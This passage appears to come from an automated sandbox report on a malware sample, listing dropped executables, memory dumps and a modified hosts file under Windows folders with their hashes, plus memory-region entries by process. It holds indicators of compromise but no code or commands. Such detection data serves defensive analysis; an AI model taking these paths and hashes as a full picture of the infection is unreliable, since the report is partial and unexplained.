SHA11ef991ca932a1c17cdd73982c655593a1ccb8a75
SHA25607fda85a55315f3307f19b678e2f7f8c0f9e892ee83256b9dfbf43c7c13722f6
SHA51241d9445c730693ac63046f3d3c718ab25cfde130c95f5e9c30bc56be5226d51361532d8fa1c74f81896a4771289033e78dc78d38a9a309248e4f6627e6664e36
-
C:\Windows\TEMP\gtuqsjqjh\4476.dmpFilesize
1.1MB
MD5f3e4f1d5d70d4e5fa6f0a542f749651e
SHA1eeb939f01938c7dd897c32675c79926113d29dad
SHA2568fc6dfab0038cfedee6ab9b085683e6dc6b35dafc0727caa6dd9b1e59b4803db
SHA512dd160ef3bf70dce8dd059654f618a31a56eff9f4ab5a87a6c4f3e72a3d3b9275cea415371c1e98e200ad4f0ebe82361f2a45357d92b5391bc3ee73679e96a703
-
C:\Windows\TEMP\gtuqsjqjh\4932.dmpFilesize
8.6MB
MD5208735557b8553b05a1533c4f6503416
SHA10b0c562241d3529893fe8e138aedf378a73a3dec
SHA256f492f6f444ee89d59bd2a873c6cc5d06c54fcfaf5a81a303bbb7cf2c642d7828
SHA512bd3301d54764a74302ca897a3adedf278964ec63d4829dc16a00c0c90f494616fd241816c2abbbdf6ddd826b8da4a946d19ddfc64aa70e33c55d19e868608c16
-
C:\Windows\TEMP\gtuqsjqjh\780.dmpFilesize
1.9MB
MD5fbaf25e27e0927d23b37ed252c64d3a4
SHA10d6b77bb5bec7d5d58feb94108621f40e438487d
SHA256b0c43a3889d50e412e9f1e83f838842d86344000487680de95f67423eed3c5ce
SHA51260b932067ae135bb13ed7257f53097995e0b30ed0e6ca85b96636c30952f7a8fc2fce41d28d61e52e9d3c096e6cad02fdcb7510b66e50b7c12039e5346918fde
-
C:\Windows\Temp\bvzeemvvy\gzbahn.exeFilesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
C:\Windows\Temp\gtuqsjqjh\vmebnmlbn.exeFilesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
C:\Windows\Temp\nszA9CF.tmp\System.dllFilesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
C:\Windows\Temp\nszA9CF.tmp\nsExec.dllFilesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
C:\Windows\Temp\xohudmc.exeFilesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
C:\Windows\gtuqsjqjh\Corporate\vfshost.exeFilesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exeFilesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exeFilesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
C:\Windows\tbzbbivf\simzbkl.exeFilesize
8.6MB
MD576114eab6c0d3c5c5a2e068b4da7c321
SHA17fbb2121c81c159683e0deb12e14bd13a0274549
SHA2563a0bb06d307d96e8fa00248971e3a6ff0b3d0925acdc934477c838c097acb499
SHA512e2d3c0bdccb0bd8ec9f8b61466568e99efe5199c7c988dd7daa9dfe50ca2c46735f86f17609f54eb79f8bb70a36be44c1e308ca642c9d5078f8d9fd049e1da52
-
memory/60-174-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/440-183-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/456-0-0x0000000000400000-0x0000000000A9B000-memory.dmpFilesize
6.6MB
-
memory/924-77-0x0000000001100000-0x000000000114C000-memory.dmpFilesize
304KB
-
memory/1048-213-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/1180-147-0x0000000010000000-0x0000000010008000-memory.dmpFilesize
32KB
-
memory/1488-227-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/1652-222-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/1988-232-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/2172-249-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-180-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-251-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-166-0x000001A73C630000-0x000001A73C634000-memory.dmpFilesize
16KB
-
memory/2172-250-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-167-0x000001A73C2E0000-0x000001A73C2E4000-memory.dmpFilesize
16KB
-
memory/2172-199-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-224-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-165-0x000001A73BEB0000-0x000001A73BEB4000-memory.dmpFilesize
16KB
-
memory/2172-254-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-164-0x000001A73BA70000-0x000001A73BA80000-memory.dmpFilesize
64KB
-
memory/2172-161-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-233-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-215-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-256-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2172-186-0x000001A73BEB0000-0x000001A73BEB4000-memory.dmpFilesize
16KB
-
memory/2172-257-0x00007FF725730000-0x00007FF725850000-memory.dmpFilesize
1.1MB
-
memory/2248-234-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/2248-236-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/2344-178-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/2776-135-0x00007FF691840000-0x00007FF69192E000-memory.dmpFilesize
952KB
-
memory/2776-136-0x00007FF691840000-0x00007FF69192E000-memory.dmpFilesize
952KB
-
memory/2876-209-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/3224-140-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/3224-157-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/3572-238-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/3752-192-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/4088-201-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/4156-188-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/4236-248-0x0000000000DC0000-0x0000000000DD2000-memory.dmpFilesize
72KB
-
memory/4332-230-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/4568-196-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/4680-170-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB
-
memory/4692-218-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmpFilesize
364KB